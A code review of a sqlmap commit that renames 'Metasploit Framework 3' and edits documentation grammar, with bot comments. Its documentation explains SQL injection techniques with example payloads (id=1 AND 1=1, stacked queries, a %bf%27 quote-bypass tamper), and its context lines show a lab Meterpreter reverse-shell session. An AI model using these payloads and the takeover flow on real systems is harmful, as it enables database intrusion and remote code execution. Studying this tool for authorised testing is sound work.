@@ -93,26 +93,23 @@ on the operating system via out-of-band connections.
@@ -138,15 +135,15 @@ for the database management system that you are going to attack:
the sqlmap update functionality (--update switch) you need to
install respectively
python-ntlm and
-python-svn libraries.
-Optionally, if you are running sqlmap on Windows, you may wish to install
+python-svn libraries respectively.
+Optionally, if you are running sqlmap on Windows, you may wish to install the
PyReadline
-library to be able to take advantage of the sqlmap TAB completion and
+library in order to take advantage of the sqlmap TAB completion and
history support features in the SQL shell and OS shell.
-Note that these functionalities are available natively by Python standard
+Note that these functionalities are available natively via the standard Python
readline
library on other operating systems.
-You can also choose to install
+
You can also choose to install the
Psyco library to eventually speed up the sqlmap algorithmic
operations.
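Review bot: "respectively" now appears twice in one sentence: the unchanged context line still reads "install respectively" and the new line ends with "python-svn libraries respectively." Drop one of them, for example "you need to install the python-ntlm and python-svn libraries respectively." In the Psyco sentence, "to eventually speed up" reads as a false friend for "possibly"; plain "to speed up" is enough.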
@@ -157,13 +154,13 @@ operations.
Detect and exploit a SQL injection
Let's say that you are auditing a web application and found a web page
-that accepts dynamic user-provided values on GET or POST
-parameters or HTTP Cookie values or HTTP User-Agent
-header value.
+that accepts dynamic user-provided values via GET, POST
+or Cookie parameters or via the HTTP User-Agent
+request header.
You now want to test if these are affected by a SQL injection
vulnerability, and if so, exploit them to retrieve as much information as
-possible out of the web application's back-end database management system
-or even be able to access the underlying file system and operating system.
+possible from the back-end database management system, or even be able to
+access the underlying file system and operating system.
In a simple world, consider that the target url is:
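Review bot: the unchanged context line "consider that the target url is:" should read "URL"; since the surrounding paragraph is being rewritten, fix the capitalisation in the same edit.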
@@ -176,57 +173,53 @@ or even be able to access the underlying file system and operating system.
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1
-is the same page as the original one and:
+is the same page as the original one and (the condition evaluates to True):
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2
-differs from the original one, it means that you are in front of a SQL
+
differs from the original one (the condition evaluates to False).
+This likely means that you are in front of a SQL
injection vulnerability in the id GET parameter of the
-index.php web application page which means that potentially no
-IDS/IPS, no web application firewall, no parameters' value sanitization is
-performed on the server-side before sending the SQL statement to the
-back-end database management system the web application relies on.
-This is a quite common flaw in dynamic content web applications and it
+index.php page. Additionally, no sanitisation of user's supplied
+input is taking place before the SQL statement is sent to the
+back-end database management system.
+This is quite a common flaw in dynamic content web applications and it
does not depend upon the back-end database management system nor on the web
-application programming language: it is a programmer code's security flaw.
+application programming language; it is a flaw within the application code.
The
Open Web Application Security Project
-rated on 2010 in their
-OWASP Top Ten survey this vulnerability as the
-most common and important web application vulnerability along with other
-injection flaws.
-Back to the scenario, probably the SQL SELECT statement into
-get_int.php has a syntax similar to the following SQL query, in
-pseudo PHP code:
+rated this class of vulnerability as the
+most common and serious web application vulnerability in their
+Top Ten list from 2010.
+Now that you have found the vulnerable parameter, you can exploit it by
+manipulating the id parameter value in the HTTP request.
+Back to the scenario, we can make an educated guess about the probable
+syntax of the SQL SELECT statement where the user supplied value is
+being used in the get_int.php web page. In pseudo PHP code:
$query = "SELECT [column(s) name] FROM [table name] WHERE id=" . $_REQUEST['id'];
-As you can see, appending any other syntatically valid SQL condition after
-a value for id such condition will take place when the web
-application passes the query to the back-end database management system
-that executes it, that is why the condition id=1 AND 1=1 is valid
-(True) and returns the same page as the original one, with the
-same content. This is the case of a boolean-based blind SQL injection
-vulnerability. However, sqlmap is able to detect any type of SQL injection
-and adapt its work-flow accordingly. Read below for further details.
-Moreover, in this simple and easy to inject scenario it would be also
-possible to append, not just one or more valid SQL condition(s), but also
-stacked SQL queries, for instance something like [...]&id=1;
-ANOTHER SQL QUERY# if the web application technology supports
-stacked queries, also known as multiple statements.
-Now that you found this SQL injection vulnerable parameter, you can
-exploit it by manipulating the id parameter value in the HTTP
-request.
-There exist many
-resources
-on the Net explaining in depth how to prevent, detect and exploit SQL
-injection vulnerabilities in web application and it is recommended to read
-them if you are not familiar with the issue before going ahead with sqlmap.
-Passing the original address, http://192.168.136.131/sqlmap/mysql/get_int.php?id=1
+
As you can see, appending a syntactically valid SQL statement that will
+evaluate to a True condition after the value for the id
+parameter (such as id=1 AND 1=1) will result in the web application
+returning the same web page as in the original request (where no SQL
+statement is added).
+This is because the back-end database management system has evaluated the
+injected SQL statement.
+The previous example describes a simple boolean-based blind SQL injection
+vulnerability.
+However, sqlmap is able to detect any type of SQL injection flaw and adapt
+its work-flow accordingly.
+In this simple scenario it would also be possible to append, not just one or
+more valid SQL conditions, but also (depending on the DBMS) stacked SQL
+queries. For instance: [...]&id=1;ANOTHER SQL QUERY#.
+sqlmap can automate the process of identifying and exploiting this type of
+vulnerability.
+Passing the original address, http://192.168.136.131/sqlmap/mysql/get_int.php?id=1
to sqlmap, the tool will automatically:
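Review bot: "no sanitisation of user's supplied input is taking place" states as fact what the removed text hedged with "potentially": a different page for id=1 AND 1=2 shows that the condition reached the DBMS, not that no filtering or WAF exists in front of it, so keep "potentially" (and write "user-supplied input"). Two smaller points in the same hunk: "Now that you have found the vulnerable parameter, you can exploit it ..." has been moved before the query is explained, so it now reads out of order with the "Back to the scenario ..." sentence that follows it; and "appending a syntactically valid SQL statement that will evaluate to a True condition" describes a condition (AND 1=1), not a statement.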
@@ -237,7 +230,14 @@ vulnerable parameter(s);
- Depending on the user's options, it will extensively fingerprint,
enumerate data or takeover the database server as a whole.
-
+
+...and depending on supplied options, it will enumerate data or takeover the
+database server entirely.
+There exist many
+resources
+on the web explaining in depth how to detect, exploit and prevent SQL
+injection vulnerabilities in web applications. It is recommendeded that you read
+them before going much further with sqlmap.
Direct connection to the database management system
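Review bot: "recommendeded" in the new resources sentence is a typo for "recommended". The added line "...and depending on supplied options, it will enumerate data or takeover the database server entirely." repeats the bullet immediately above it ("Depending on the user's options, it will extensively fingerprint, enumerate data or takeover ..."); keep one of the two, and in either case the verb is "take over" (two words).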
@@ -280,30 +280,30 @@ For each HTTP response, by making a comparison between the HTTP response
time with the original request, the tool inference the output of
the injected statement character by character. Like for boolean-based
technique, the bisection algorithm is applied.
-- Error-based SQL injection: sqlmap replaces or append to the
-affected parameter a database-specific syntatically wrong statement and
-parses the HTTP response headers and body in search of DBMS error messages
-containing the injected pre-defined chain of characters and the statement
-output within. This technique works when the web application has been
-configured to disclose back-end database management system error messages
-only.
+- Error-based SQL injection: sqlmap replaces or appends to
+the affected parameter a database-specific error message provoking statement
+and parses the HTTP response headers and body in search of DBMS error messages
+containing the injected pre-defined chain of characters and the subquery
+statement output within. This technique works only when the web application
+has been configured to disclose back-end database management system error
+messages.
- UNION query SQL injection, also known as inband SQL
injection: sqlmap appends to the affected parameter a syntatically
-valid SQL statement string starting with a
UNION ALL SELECT.
-This techique works when the web application page passes the output of the
-SELECT statement within a for cycle, or similar, so that
-each line of the query output is printed on the page content.
+valid SQL statement starting with an UNION ALL SELECT.
+This techique works when the web application page passes directly the output
+of the SELECT statement within a for loop, or similar, so
+that each line of the query output is printed on the page content.
sqlmap is also able to exploit partial (single entry) UNION query SQL
injection vulnerabilities which occur when the output of the
-statement is not cycled in a for construct whereas only the first
+statement is not cycled in a for construct, whereas only the first
entry of the query output is displayed.
- Stacked queries SQL injection, also known as multiple
statements SQL injection: sqlmap tests if the web application supports
-stacked queries then, in case it does support, it appends to the affected
+stacked queries and then, in case it does support, it appends to the affected
parameter in the HTTP request, a semi-colon (
;) followed by the
SQL statement to be executed. This technique is useful to run SQL
-statements other than SELECT like, for instance, data
-definition or data manipulation statements possibly leading
+statements other than SELECT, like for instance, data
+definition or data manipulation statements, possibly leading
to file system read and write access and operating system command
execution depending on the underlying back-end database management system
and the session user privileges.
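Review bot: "techique" is carried over from the removed line into the new "This techique works when ..." line; fix it to "technique" while reflowing, and "an UNION ALL SELECT" should read "a UNION ALL SELECT". "error message provoking statement" needs hyphens ("error-message-provoking statement") to be readable. The unchanged context "the tool inference the output" in the time-based bullet should be "infers"; worth folding into this same doc edit.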
@@ -1008,7 +1008,7 @@ Options:
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
- --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
+ --msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
@@ -2764,7 +2764,7 @@ operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
-[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode
+[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
@@ -2779,7 +2779,7 @@ which payload do you want to use?
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
-[hh:mm:43] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
+[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
_
| | o
@@ -2801,7 +2801,7 @@ LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
-[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
+[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
diff --git a/doc/README.pdf b/doc/README.pdf
index 159589f70..9771870e1 100644
Binary files a/doc/README.pdf and b/doc/README.pdf differ
diff --git a/doc/README.sgml b/doc/README.sgml
index 6172950b7..62edb11ae 100644
--- a/doc/README.sgml
+++ b/doc/README.sgml
@@ -101,7 +101,7 @@ Assume that:
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=1
-is the same page as the original one and (the condition evaluates to True):
+is the same page as the original one and (the condition evaluates to True):
http://192.168.136.131/sqlmap/mysql/get_int.php?id=1+AND+1=2
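Review bot: the removed and added lines at 101 are identical as displayed, so this hunk is a whitespace-only change (probably a trailing space); confirm it is intended, otherwise drop it to keep the diff minimal. If the line is being touched anyway, the parenthetical sits awkwardly after "and"; "is the same page as the original one (the condition evaluates to True), and:" reads more naturally, and the same wording should go into README.html.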
@@ -923,7 +923,7 @@ Options:
--os-smbrelay One click prompt for an OOB shell, meterpreter or VNC
--os-bof Stored procedure buffer overflow exploitation
--priv-esc Database process' user privilege escalation
- --msf-path=MSFPATH Local path where Metasploit Framework 3 is installed
+ --msf-path=MSFPATH Local path where Metasploit Framework is installed
--tmp-path=TMPPATH Remote absolute path of temporary files directory
Windows registry access:
@@ -2854,7 +2854,7 @@ operating system?
[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)
[2] Stand-alone payload stager (file system way)
>
-[hh:mm:35] [INFO] creating Metasploit Framework 3 multi-stage shellcode
+[hh:mm:35] [INFO] creating Metasploit Framework multi-stage shellcode
which connection type do you want to use?
[1] Reverse TCP: Connect back from the database host to this machine (default)
[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports
@@ -2869,7 +2869,7 @@ which payload do you want to use?
[3] VNC
>
[hh:mm:40] [INFO] creation in progress ... done
-[hh:mm:43] [INFO] running Metasploit Framework 3 command line interface locally, please wait..
+[hh:mm:43] [INFO] running Metasploit Framework command line interface locally, please wait..
_
| | o
@@ -2891,7 +2891,7 @@ LPORT => 60641
LHOST => 192.168.136.1
[*] Started reverse handler on 192.168.136.1:60641
[*] Starting the payload handler...
-[hh:mm:48] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval',
+[hh:mm:48] [INFO] running Metasploit Framework shellcode remotely via UDF 'sys_bineval',
please wait..
[*] Sending stage (749056 bytes) to 192.168.136.129
[*] Meterpreter session 1 opened (192.168.136.1:60641 -> 192.168.136.129:1689) at Mon Apr 11
diff --git a/doc/THANKS b/doc/THANKS
index 1ccf013db..8a3375b74 100644
--- a/doc/THANKS
+++ b/doc/THANKS
@@ -504,7 +504,7 @@ Kazim Bugra Tombul
for reporting a minor bug
Efrain Torres
- for helping me out to improve the Metasploit Framework 3 sqlmap
+ for helping me out to improve the Metasploit Framework sqlmap
auxiliary module and for commiting it on the Metasploit official
subversion repository
for his great Metasploit WMAP Framework
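Review bot: "commiting" on the unchanged context line directly below the edited one is a typo for "committing"; since this entry is being touched, correct it in the same commit.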
@@ -694,7 +694,7 @@ AthCon Conference team
Slides: http://goo.gl/QMfjO
Metasploit Framework development team
- for their powerful tool Metasploit Framework 3, used by sqlmap, among
+ for their powerful tool Metasploit Framework, used by sqlmap, among
others things, to create the shellcode and establish an out-of-band
connection between sqlmap and the database server
Homepage: http://www.metasploit.com
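Review bot: "among others things" on the context line should be "among other things"; fix it alongside the rename in this entry.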
diff --git a/lib/core/option.py b/lib/core/option.py
index e2d83cb9b..207fee01e 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -608,13 +608,13 @@ def __setMetasploit():
break
if condition:
- debugMsg = "provided Metasploit Framework 3 path "
+ debugMsg = "provided Metasploit Framework path "
debugMsg += "'%s' is valid" % conf.msfPath
logger.debug(debugMsg)
msfEnvPathExists = True
else:
- warnMsg = "the provided Metasploit Framework 3 path "
+ warnMsg = "the provided Metasploit Framework path "
warnMsg += "'%s' is not valid. The cause could " % conf.msfPath
warnMsg += "be that the path does not exists or that one "
warnMsg += "or more of the needed Metasploit executables "
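Review bot: the continuation of this warning on the context line reads "the path does not exists"; it should be "does not exist". Since the message block is being edited, correct it here.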
@@ -623,11 +623,11 @@ def __setMetasploit():
logger.warn(warnMsg)
else:
warnMsg = "you did not provide the local path where Metasploit "
- warnMsg += "Framework 3 is installed"
+ warnMsg += "Framework is installed"
logger.warn(warnMsg)
if not msfEnvPathExists:
- warnMsg = "sqlmap is going to look for Metasploit Framework 3 "
+ warnMsg = "sqlmap is going to look for Metasploit Framework "
warnMsg += "installation into the environment paths"
logger.warn(warnMsg)
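Review bot: "look for Metasploit Framework installation into the environment paths" is awkward English; "look for a Metasploit Framework installation in the environment paths" (or "in PATH", which is what the following hunk actually walks) is clearer.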
@@ -647,7 +647,7 @@ def __setMetasploit():
condition &= os.path.exists(normalizePath(os.path.join(envPath, "msfpayload")))
if condition:
- infoMsg = "Metasploit Framework 3 has been found "
+ infoMsg = "Metasploit Framework has been found "
infoMsg += "installed in the '%s' path" % envPath
logger.info(infoMsg)
@@ -657,7 +657,7 @@ def __setMetasploit():
break
if not msfEnvPathExists:
- errMsg = "unable to locate Metasploit Framework 3 installation. "
+ errMsg = "unable to locate Metasploit Framework installation. "
errMsg += "Get it from http://metasploit.com/framework/download/"
raise sqlmapFilePathException, errMsg
diff --git a/lib/parse/cmdline.py b/lib/parse/cmdline.py
index 5d9f44f9e..bb1b03534 100644
--- a/lib/parse/cmdline.py
+++ b/lib/parse/cmdline.py
@@ -421,7 +421,7 @@ def cmdLineParser():
help="Database process' user privilege escalation")
takeover.add_option("--msf-path", dest="msfPath",
- help="Local path where Metasploit Framework 3 "
+ help="Local path where Metasploit Framework "
"is installed")
takeover.add_option("--tmp-path", dest="tmpPath",
diff --git a/lib/takeover/metasploit.py b/lib/takeover/metasploit.py
index 4bdec6e15..166de2102 100644
--- a/lib/takeover/metasploit.py
+++ b/lib/takeover/metasploit.py
@@ -368,7 +368,7 @@ class Metasploit:
def __runMsfCliSmbrelay(self):
self.__forgeMsfCliCmdForSmbrelay()
- infoMsg = "running Metasploit Framework 3 command line "
+ infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
@@ -378,7 +378,7 @@ class Metasploit:
def __runMsfCli(self, exitfunc):
self.__forgeMsfCliCmd(exitfunc)
- infoMsg = "running Metasploit Framework 3 command line "
+ infoMsg = "running Metasploit Framework command line "
infoMsg += "interface locally, please wait.."
logger.info(infoMsg)
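Review bot: this infoMsg is byte-for-byte the same as the one in __runMsfCliSmbrelay in the hunk above; a single module-level constant for the "running Metasploit Framework command line interface locally, please wait.." text would have made this rename a one-line change and keeps the two paths from drifting apart later.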
@@ -386,14 +386,14 @@ class Metasploit:
self.__msfCliProc = execute(self.__cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def __runMsfShellcodeRemote(self):
- infoMsg = "running Metasploit Framework 3 shellcode "
+ infoMsg = "running Metasploit Framework shellcode "
infoMsg += "remotely via UDF 'sys_bineval', please wait.."
logger.info(infoMsg)
self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval")
def __runMsfShellcodeRemoteViaSexec(self):
- infoMsg = "running Metasploit Framework 3 shellcode remotely "
+ infoMsg = "running Metasploit Framework shellcode remotely "
infoMsg += "via shellcodeexec, please wait.."
logger.info(infoMsg)
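Review bot: the context line above the renamed messages runs execute(self.__cliCmd, shell=True, ...), so whatever __forgeMsfCliCmd assembles into __cliCmd is interpreted by a shell; if the --msf-path value ends up in that string, it should be shell-quoted before concatenation, or the command passed as an argument list without shell=True. Not introduced by this change, but worth a follow-up while these methods are being touched.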
@@ -495,7 +495,7 @@ class Metasploit:
return returncode
def createMsfShellcode(self, exitfunc, format, extra, encode):
- infoMsg = "creating Metasploit Framework 3 multi-stage shellcode "
+ infoMsg = "creating Metasploit Framework multi-stage shellcode "
logger.info(infoMsg)
self.__randStr = randomStr(lowercase=True)
@@ -574,7 +574,7 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
func()
- debugMsg = "Metasploit Framework 3 command line interface exited "
+ debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, func)
logger.debug(debugMsg)
@@ -593,7 +593,7 @@ class Metasploit:
else:
self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self.__randFile)
- debugMsg = "Metasploit Framework 3 console exited with return "
+ debugMsg = "Metasploit Framework console exited with return "
debugMsg += "code %s" % self.__controlMsfCmd(self.__msfCliProc, self.uncPathRequest)
logger.debug(debugMsg)
@@ -603,6 +603,6 @@ class Metasploit:
if self.connectionStr.startswith("bind"):
self.spHeapOverflow()
- debugMsg = "Metasploit Framework 3 command line interface exited "
+ debugMsg = "Metasploit Framework command line interface exited "
debugMsg += "with return code %s" % self.__controlMsfCmd(self.__msfCliProc, self.spHeapOverflow)
logger.debug(debugMsg)
diff --git a/sqlmap.conf b/sqlmap.conf
index c0e23d83b..7a6c78ec7 100644
--- a/sqlmap.conf
+++ b/sqlmap.conf
@@ -471,7 +471,7 @@ osBof = False
# payload to be Meterpreter.
privEsc = False
-# Local path where Metasploit Framework 3 is installed.
+# Local path where Metasploit Framework is installed.
# Valid: file system path
msfPath =
diff --git a/tamper/unmagicquotes.py b/tamper/unmagicquotes.py
index 2e91acb1f..98b588d7d 100644
--- a/tamper/unmagicquotes.py
+++ b/tamper/unmagicquotes.py
@@ -22,7 +22,8 @@ def dependencies():
def tamper(payload):
"""
- Replaces quote character (') with a multi-byte combo %bf%27 together with generic comment at the end (to make it work)
+ Replaces quote character (') with a multi-byte combo %bf%27 together with
+ generic comment at the end (to make it work)
Example:
* Input: 1' AND 1=1
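Review bot: the reflowed docstring still explains the appended comment only as "(to make it work)"; say what it is for (the trailing comment masks the remainder of the original query after the injected quote) so readers know when this tamper script applies and why the comment is required.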